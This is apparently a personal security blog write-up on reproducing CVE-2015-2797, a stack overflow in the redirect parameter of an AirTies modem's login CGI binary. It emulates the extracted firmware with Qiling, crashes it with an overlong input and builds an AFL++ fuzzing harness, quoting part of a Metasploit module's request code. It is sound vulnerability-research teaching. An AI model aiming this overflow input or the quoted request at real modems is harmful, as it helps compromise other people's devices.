cool head picture

UNLE⛧SH THE BEAST ト何ゼ

Reproducing ndays with Qiling

March 15, 2021 // echel0n

Reproducing n-day vulnerabilities and writing N-day based fuzzer with Qiling

Hello guys! In this blog I will explain how to reproduce and experiment old n-days with amazing Qiling framework.

I was studying exploitation techniques on pwn.college for months and I felt that I should do something more realistic. The idea came to my mind "I have already studied stack and buffer overflows, so why don't I just do some google search `stack overflow some_modem_firm`?". I found one old stack-based buffer overflow in Airties 5650 old firmware. But, I had one last problem. The problem was "how could I experiment this vulnerability and analyze it without the physical modem?" And I thought that I can use Qiling Framework for the first time on a real target. Voila, great! I could not help myself and one another idea came to my mind too. I have already finished fuzzingbook.org study too, and asked myself "could I write a fuzzer for this?" I watched "Build a Fuzzer Based on a 1day Bug" presentation by Lau Kai Jern, then I decided to fuzz the target. You guys, if you are interested in Qiling and fuzzing you should see the video too.

The selected vulnerability and binary

I was not so much picky about the vulnerability, I just picked the first result on "stack bufferoverflow exploit airties" search and it was CVE-2015-2797, It also had one metasploit module, which is great because it was going to help me on the way of understanding the vulnerability.

Explanation for CVE-2015-2797 is this;

  1. Stack-based buffer overflow in 

  2.     AirTies Air 6372, 5760, 5750, 5650TT, 5453, 5444TT, 5443, 5442, 5343, 5342, 5341, 

  3.     and 5021 DSL modems with firmware 1.0.2.0 and earlier allows remote attackers to execute 

  4.     arbitrary code via a long string in the redirect parameter to cgi-bin/login.

The firmware is available on the internet and I downloaded it on my machine and extracted with sasquatch tool. After very cliche firmware extraction steps, luckily I got what I need to run this cgi-bin/login binary. Let's run this binary with Qiling Framework then!

Running binary with qltool

  1. qltool run -f /home/qiling_projects/Airties/5650v3TT/squashfs-root/webs/cgi-bin/login --rootfs /home/qiling_projects/Airties/5650v3TT/squashfs-root --strace



The output is looking nice, no error and no warnings about something hurr-durr library. This means, the environment is ready to be scripted. Yey! But first let's findout how vulnerability occurs in the target binary.

Understanding the Vulnerability

At this step, we need to analyze how this binary works, to do so we can check disassembled flow of it.



Target binary is very small and has not so much complex flow. Also, It is very understandable for me even I don't know MIPS architecture.

At this step, let's look at the metasploit code and decide to which variables we need to set. 

  1. def execute_command(cmd, opts)

  2.     shellcode = prepare_shellcode(cmd)

  3.     begin

  4.       res = send_request_cgi({

  5.         'method' => 'POST',

  6.         'uri'     => '/cgi-bin/login',

  7.         'encode_params' => false,

  8.         'vars_post' => {

  9.           'redirect' => shellcode,

  10.           'user'     => rand_text_alpha(5),

  11.           'password' => rand_text_alpha(8)

  12.         }

  13.       })

It is a very clear POST request but there is one problem. We will not emulate the entire web server, we will emulate only login cgi binary. So we need to know how these parameters are ending up in that binary.
For example, this is the very first jump block. 



  1. lw v0, -sym.imp.getenv(gp)

I already told you, I don't know MIPS but somehow this line tells me, the binary reads from ENV variables and processes like that.

TL;DR After analyzing session, I figured out, we need to set these environment variables while we are running login binary. It is okay to set method to GET because the vulnerability is in redirect parameter. 

  1. "REQUEST_METHOD": "GET",

  2.     "REQUEST_URI": "/cgi-bin/login",

  3.     "CONTENT-TYPE": "application/x-www-form-urlencoded",

  4.     "REMOTE_ADDR": "0.0.0.0",

  5.     "REMOTE_PORT": "1881",

  6.     #"HTTP_COOKIE": "noneed=1",

  7.     "QUERY_STRING": "user=echel0n&password=ILOVEQILING&redirect=YEEEBOIII"

The Scripting Part

Let's start with basics.

  1. def main(input_content: bytes, enable_trace: bool, hook: bool):

  2.     env_vars = {

  3.         "REQUEST_METHOD": "GET",

  4.         "REQUEST_URI": "/cgi-bin/login",

  5.         "CONTENT-TYPE": "application/x-www-form-urlencoded",

  6.         "REMOTE_ADDR": "0.0.0.0",

  7.         "REMOTE_PORT": "80",

  8.         "QUERY_STRING": "user=echel0n&password=ILOVEQILING&redirect=" + "vulnerabilityhere",

  9.     }

  10.     ql = Qiling(

  11.         ["/home/qiling_projects/Airties/5650v3TT/squashfs-root/webs/cgi-bin/login"],

  12.         rootfs="/home/qiling_projects/Airties/5650v3TT/squashfs-root/",

  13.         output="default",

  14.         env=env_vars,

  15.         console=True if enable_trace else False,

  16.     )

It is ready to ql.run() but I want to know if I will end up in right direction in binary's main. To do so, we can get some help from capstone library. It will do a lot of damage to running time of this script. However, I don't know another way to analyze. If anyone know more efficent way, please reach to me on twitter, I really would like to listen. 

  1. last_register = None

  2. only_main = False

  3. 

  4. def hook_callback(ql, address, size):

  5.     global last_register

  6.     global only_main

  7.     # read current instruction bytes

  8.     data = ql.mem.read(address, size)

  9.     # initialize Capstone

  10.     md = Cs(CS_ARCH_MIPS, CS_MODE_MIPS32 + CS_MODE_BIG_ENDIAN)

  11.     # disassemble current instruction

  12.     for i in md.disasm(data, address):

  13.         addr = f"0x{i.address:08x}"

  14.         if only_main:

  15.             if int(addr,16) > 0x00400b80 and int(addr,16) < 0x004012ac:

  16.                 last_register = [hex(ql.reg.arch_pc), hex(ql.reg.arch_sp), hex(ql.reg.get_uc_reg("ra"))]

  17.                 print("[*] 0x{:08x}: {} {}".format(i.address, i.mnemonic, i.op_str))

  18.         else:

  19.                 last_register = [hex(ql.reg.arch_pc), hex(ql.reg.arch_sp), hex(ql.reg.get_uc_reg("ra"))]

  20.                 print("[*] 0x{:08x}: {} {}".format(i.address, i.mnemonic, i.op_str))

This function will help us to read if the environment variables are all set correctly. We will hook all codes that will be run and print out to terminal. Let's run with empty environment and see where we end up in the main function.


It is very recognizable, lets look at disassembled code below.




Perfect! It runs exactly what we expected. Let's run with environment variables now.



It looks great to me. As far as i can understand, it did not accept our username and password. It is okay tho. Finally we can experiment the vulnerability now. With a little bit more scripting, we can see the details of it. Please try to understand full script below. 

  1. #!/usr/bin/env python

  2. 

  3. from capstone import *

  4. from typing import Optional, Tuple

  5. import sys

  6. import argparse

  7. from qiling import *

  8. from pwn import *

  9. 

  10. 

  11. # good informations in this file for capstone, check for further needs 

  12. # https://github.com/avast/retdec/blob/master/src/capstone2llvmirtool/capstone2llvmir.cpp

  13. 

  14. last_register = None

  15. only_main = False

  16. 

  17. def hook_callback(ql, address, size):

  18.     global last_register

  19.     global only_main

  20.     # read current instruction bytes

  21.     data = ql.mem.read(address, size)

  22.     # initialize Capstone

  23.     md = Cs(CS_ARCH_MIPS, CS_MODE_MIPS32 + CS_MODE_BIG_ENDIAN)

  24.     # disassemble current instruction

  25.     for i in md.disasm(data, address):

  26.         addr = f"0x{i.address:08x}"

  27.         if only_main:

  28.             if int(addr,16) > 0x00400b80 and int(addr,16) < 0x004012ac:

  29.                 last_register = [hex(ql.reg.arch_pc), hex(ql.reg.arch_sp), hex(ql.reg.get_uc_reg("ra"))]

  30.                 print("[*] 0x{:08x}: {} {}".format(i.address, i.mnemonic, i.op_str))

  31.         else:

  32.                 last_register = [hex(ql.reg.arch_pc), hex(ql.reg.arch_sp), hex(ql.reg.get_uc_reg("ra"))]

  33.                 print("[*] 0x{:08x}: {} {}".format(i.address, i.mnemonic, i.op_str))

  34. 

  35. 

  36. def parser() -> Optional[Tuple[str, bool, bool]]:

  37.     global only_main

  38.     parser = argparse.ArgumentParser()

  39.     parser.add_argument("--input", help="chosen AFL input file", type=str)

  40.     try:

  41.         parser.add_argument(

  42.             "--verbose", help="be verbose about process", dest="verbose", action="store_true"

  43.         )

  44.     except TypeError:

  45.         pass

  46.     try:

  47.         parser.add_argument("--hook", help="enable disasm output", dest="hook", action="store_true")

  48.     except TypeError:

  49.         pass

  50. 

  51.     try:

  52.         parser.add_argument("--main", help="show only main flow", dest="main", action="store_true")

  53.     except TypeError:

  54.         pass

  55.     args = parser.parse_args()

  56.     only_main = args.main

  57. 

  58.     if args.input is None:

  59.         print("[ERR] Please, how should I know the name of input file?")

  60.         sys.exit()

  61. 

  62.     return args.input, args.verbose, args.hook

  63. 

  64. 

  65. def read_file(filename: str) -> bytes:

  66.     file = open(filename, "rb")

  67.     content = file.read()

  68.     return content

  69. 

  70. 

  71. def main(input_content: bytes, enable_trace: bool, hook: bool):

  72.     env_vars = {

  73.         "REQUEST_METHOD": "GET",

  74.         "REQUEST_URI": "/cgi-bin/login",

  75.         "CONTENT-TYPE": "application/x-www-form-urlencoded",

  76.         "REMOTE_ADDR": "0.0.0.0",

  77.         "REMOTE_PORT": "80",

  78.         # you can also provide a input file and throw it here.

  79.         # in the metasploit module, redirect buffer size is 359

  80.         "QUERY_STRING": "user=echel0n&password=ILOVEQILING&redirect=" + "A"*370,  # fill here

  81.     }

  82.     ql = Qiling(

  83.         ["/home/qiling_projects/Airties/5650v3TT/squashfs-root/webs/cgi-bin/login"],

  84.         rootfs="/home/qiling_projects/Airties/5650v3TT/squashfs-root/",

  85.         output="default",

  86.         env=env_vars,

  87.         console=True if enable_trace else False,

  88.     )

  89. 

  90.     if hook:

  91.         main_addr = ql.os.elf_entry

  92.         ql.hook_code(hook_callback)

  93.     try:

  94.         ql.run()

  95.         # If I understood correctly, 

  96.         # unicorn will throw a signal to inform us something bad happened

  97.     except:

  98.         print("[*] It is crashed")

  99.         print("[*] Last Registers:")

  100.         print(f"[*] $pc : {hex(ql.reg.arch_pc)}")

  101.         # $sp == stack pointer

  102.         print(f"[*] $sp : {hex(ql.reg.arch_sp)}")

  103.         print("[*] $sp:data ")

  104.         # Print it out what is in the address

  105.         print(ql.mem.read(ql.reg.arch_sp,16))

  106.         sys.exit()

  107. 

  108. 

  109. if __name__ == "__main__":

  110.     input_file, verbose, hook = parser()

  111.     input_content = read_file(input_file)

  112.     main(input_content, verbose, hook)

Let's go!


I am still studying exploitation and memory corruptions but it looks a valid crash to me.

So far, we experienced the vulnerability without the physical device, yey!!!!
So... the question is "if we did not know the buffer overflow, could we find out with fuzzing?"

The fuzzing part

The example will be a very primivite and fragile, if you want to fuzz something advanced this example will not help you so much. It will crash itself so much because of the limitation of it.
You are warned.

I examined the other examples in the repository and changed little bit to fuzz the redirect parameter Here is the full script of it. 

  1. #!/usr/bin/env python

  2. 

  3. import os, sys

  4. import unicornafl

  5. 

  6. unicornafl.monkeypatch()

  7. # this is cloned repository

  8. sys.path.append("../../../")

  9. from qiling import *

  10. 

  11. def main(input_file, enable_trace=False):

  12.     env_vars = {

  13.         "REQUEST_METHOD": "GET",

  14.         "REQUEST_URI": "/cgi-bin/login",

  15.         "CONTENT-TYPE": "application/x-www-form-urlencoded",

  16.         "REMOTE_ADDR": "0.0.0.0",

  17.         "REMOTE_PORT": "1881",

  18.         "QUERY_STRING": "user=echel0n&password=ILOVEQILING&redirect=" + "A" * 0x1000 # fill here

  19.     }

  20. 

  21.     ql = Qiling(["/home/qiling_projects/Airties/5650v3TT/squashfs-root/webs/cgi-bin/login"],

  22.                  "/home/qiling_projects/Airties/5650v3TT/squashfs-root/", output="debug", env=env_vars,

  23.                 console = True if enable_trace else False)

  24. 

  25.     def place_input_callback(uc, input, _, data):

  26.         env_var = ("user=echel0n&password=ILOVEQILING&redirect=").encode()

  27.         env_vars = env_var + input + b"\x00" + (ql.path).encode() + b"\x00"

  28.         ql.mem.write(ql.target_addr, env_vars)

  29. 

  30.     def start_afl(_ql: Qiling):

  31.         try:

  32.             print("Starting afl_fuzz().")

  33.             if not _ql.uc.afl_fuzz(input_file=input_file,

  34.                                    place_input_callback=place_input_callback,

  35.                                    exits=[ql.os.exit_point]):

  36.                 print("Ran once without AFL attached.")

  37.                 os._exit(0)

  38.         except unicornafl.UcAflError as ex:

  39. 

  40.             if ex != unicornafl.UC_AFL_RET_CALLED_TWICE:

  41.                 raise

  42. 

  43.     addr = ql.mem.search("QUERY_STRING=user=echel0n&password=ILOVEQILING&redirect=".encode())

  44.     ql.target_addr = addr[0]

  45.     main_addr = ql.os.elf_entry

  46.     ql.hook_address(callback=start_afl, address=main_addr)

  47.     try:

  48.         ql.run()

  49.         os._exit(0)

  50.     except:

  51.         if enable_trace:

  52.             print("went broke, get help")

  53.         os._exit(0)

  54. 

  55. 

  56. if __name__ == "__main__":

  57.     if len(sys.argv) == 1:

  58.         raise ValueError("No input file provided.")

  59.     if len(sys.argv) > 2 and sys.argv[1] == "-t":

  60.         main(sys.argv[2], enable_trace=True)

  61.     else:

  62.         main(sys.argv[1])

  1. #!/bin/bash

  2. 

  3. if [ ! -d ./AFLplusplus ]; then

  4.   git clone https://github.com/AFLplusplus/AFLplusplus.git

  5.   cd AFLplusplus

  6.   make

  7.   cd ./unicorn_mode

  8.   ./build_unicorn_support.sh

  9.   cd ../../

  10. fi

  11. AFL_AUTORESUME=1 AFL_PATH="$(realpath ./AFLplusplus)" PATH="$AFL_PATH:$PATH" afl-fuzz -t 40 -i afl_inputs -o afl_outputs -U -- python3 ./airties5630_mips32.py @@

You have to start it from bash script and it will use the python script above. Last thing you should know that coredumps are useless for this example. You won't be using coredumps. Check the mutated input that crashed the process. The first script already gets a input file, just change the junk A*370 to input_content variable. I will warn you again, this will crash itself so much and will create a lot of duplicates and nonsense coredumps. You have to fill the buffer in the first allocation as big as you can, maybe it will do better.

Thank you for reading my write-up! Have a nice day absolute legends!